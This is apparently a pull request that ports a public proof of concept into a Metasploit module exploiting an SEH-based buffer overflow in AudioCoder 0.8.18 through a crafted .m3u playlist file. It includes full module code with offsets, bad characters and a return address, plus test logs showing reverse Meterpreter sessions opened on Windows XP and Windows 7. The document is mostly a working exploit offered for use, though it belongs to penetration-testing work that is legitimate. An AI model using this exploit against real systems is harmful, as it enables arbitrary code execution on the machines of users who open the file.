### PR TITLE
Port EDB 25141 to msf

### DIFF
--- a/modules/exploits/windows/fileformat/audio_coder_m3u.rb
+++ b/modules/exploits/windows/fileformat/audio_coder_m3u.rb
@@ -30,6 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'References'     =>
 				[
+					[ 'OSVDB', '92939' ],
 					[ 'EDB', '25141' ]
 				],
 			'DefaultOptions'  =>

--- a/modules/exploits/windows/fileformat/audio_coder_m3u.rb
+++ b/modules/exploits/windows/fileformat/audio_coder_m3u.rb
@@ -1,0 +1,76 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::FILEFORMAT
+	include Msf::Exploit::Seh
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'AudioCoder .M3U Buffer Overflow',
+			'Description'    => %q{
+					This module exploits a buffer overflow in Audio Code 0.8.18. The vulnerability
+				occurs when adding an .m3u, allowing arbitrary code execution with the privileges
+				of the user running AudioCoder. This module has been tested successfully on
+				AudioCoder 0.8.18.5353 over Windows XP SP3 and Windows 7 SP1.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'metacom', # Vulnerability discovery and PoC
+					'juan vazquez' # Metasploit module
+				],
+			'References'     =>
+				[
+					[ 'EDB', '25141' ]
+				],
+			'DefaultOptions'  =>
+				{
+					'EXITFUNC' => 'process'
+				},
+			'Platform'       => 'win',
+			'Payload'        =>
+				{
+					'Space'           => 6596,
+					'BadChars'        => "\x00\x5c\x40\x0d\x0a",
+					'DisableNops'     => true,
+					'StackAdjustment' => -3500,
+				},
+
+			'Targets'        =>
+				[
+					[ 'AudioCoder 0.8.18.5353 / Windows XP SP3 / Windows 7 SP1',
+						{
+							'Ret'     => 0x66011b56, # ppr from libiconv-2.dll
+							'Offset'  => 765
+						}
+					]
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => 'May 01 2013',
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']),
+			], self.class)
+
+	end
+
+	def exploit
+		buffer = "http://"
+		buffer << rand_text(target['Offset'])
+		buffer << generate_seh_record(target.ret)
+		buffer << payload.encoded
+
+		file_create(buffer)
+	end
+end

--- a/modules/exploits/windows/fileformat/audio_coder_m3u.rb
+++ b/modules/exploits/windows/fileformat/audio_coder_m3u.rb
@@ -44,7 +44,6 @@ class Metasploit3 < Msf::Exploit::Remote
 					'DisableNops'     => true,
 					'StackAdjustment' => -3500,
 				},
-
 			'Targets'        =>
 				[
 					[ 'AudioCoder 0.8.18.5353 / Windows XP SP3 / Windows 7 SP1',


### PR DESCRIPTION
Port http://www.exploit-db.com/exploits/25141/ to msf. Vulnerable application on the exploit-db link.

Tested on Windows XPSP3 and W7SP1:

```
msf exploit(audio_coder_m3u) > rexploit
[*] Reloading module...

[+] msf.m3u stored at /Users/juan/.msf4/local/msf.m3u
msf exploit(audio_coder_m3u) > use exploit/multi/handler 
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.0.6:4444 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 192.168.0.6
[*] Meterpreter session 1 opened (192.168.0.6:4444 -> 192.168.0.6:53008) at 2013-05-02 21:56:41 -0500

meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.0.6 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.0.6:4444 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 192.168.0.6
[*] Meterpreter session 2 opened (192.168.0.6:4444 -> 192.168.0.6:53020) at 2013-05-02 21:58:02 -0500

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
smeterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.181 - Meterpreter session 2 closed.  Reason: User exit

```
